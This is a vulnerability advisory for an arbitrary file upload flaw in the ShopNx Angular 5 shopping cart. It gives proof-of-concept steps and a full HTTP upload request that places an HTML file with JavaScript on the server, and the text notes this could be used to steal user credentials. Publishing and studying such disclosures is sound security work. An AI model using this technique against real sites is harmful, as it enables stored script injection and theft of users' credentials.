Title: 
======= 
ShopNx - Angular5 Single Page Shopping Cart Application 1 - Arbitrary File Upload

Introduction:
========
ShopNx 1 is an Angular 5 single page application which suffers from arbitrary file upload vulnerability .
Attacker can upload malicious files on servers because
the application fails to sufficiently sanitize user-supplied input. 
========

Vulnerability Disclosure: 
========================== 
2018-06-17: Public Disclosure 

Affected Product(s):
===================== 
ShopNx - Angular5 Single Page Shopping Cart Application 1

Exploitation Technique: 
======================== 
Remote
 
Severity Level: 
================ 
High 

Technical Details & Description: 
================================= 
There is no sanitization to prevent uploading files on node.js application . 
Attacker can upload malicious html file (or other file) which contains javascript payload to steal user's credentials . 
To exploit this vulnerability , follow these steps : 
# POC :
1) Login as a regular user and navigate to "edit profile"
2) Click on "Avatar" and upload your HTML file which contains malicious javascript code. 
3) You can find your uploaded file here :
   Path : /uploads/[Your File]

# Request :
========================= 
POST /api/media HTTP/1.1
Host: shop.codenx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://shop.codenx.com/account/edit-profile
Content-Length: 367
Content-Type: multipart/form-data; boundary=---------------------------31031276124582
Connection: keep-alive

-----------------------------31031276124582
Content-Disposition: form-data; name="file"; filename="file.html"
Content-Type: text/html

<html>
<head>
<title>FILE</title>
</head>
<body>
    <script>
        console.log(document.domain);
    </script>
</body>
</html>
-----------------------------31031276124582--

=================================

Solution
========= 
There is no sanitization on the file name or contents.developer must check and sanitize inputs to prevent this vulnerability. 
https://www.wordfence.com/learn/how-to-prevent-file-upload-vulnerabilities/

Credits 
======== 
L0RD 

Contact 
======== 
borna.nematzadeh123@gmail.com
 
References 
========== 
https://cwe.mitre.org/data/definitions/434.html
https://www.owasp.org/index.php/Unrestricted_File_Upload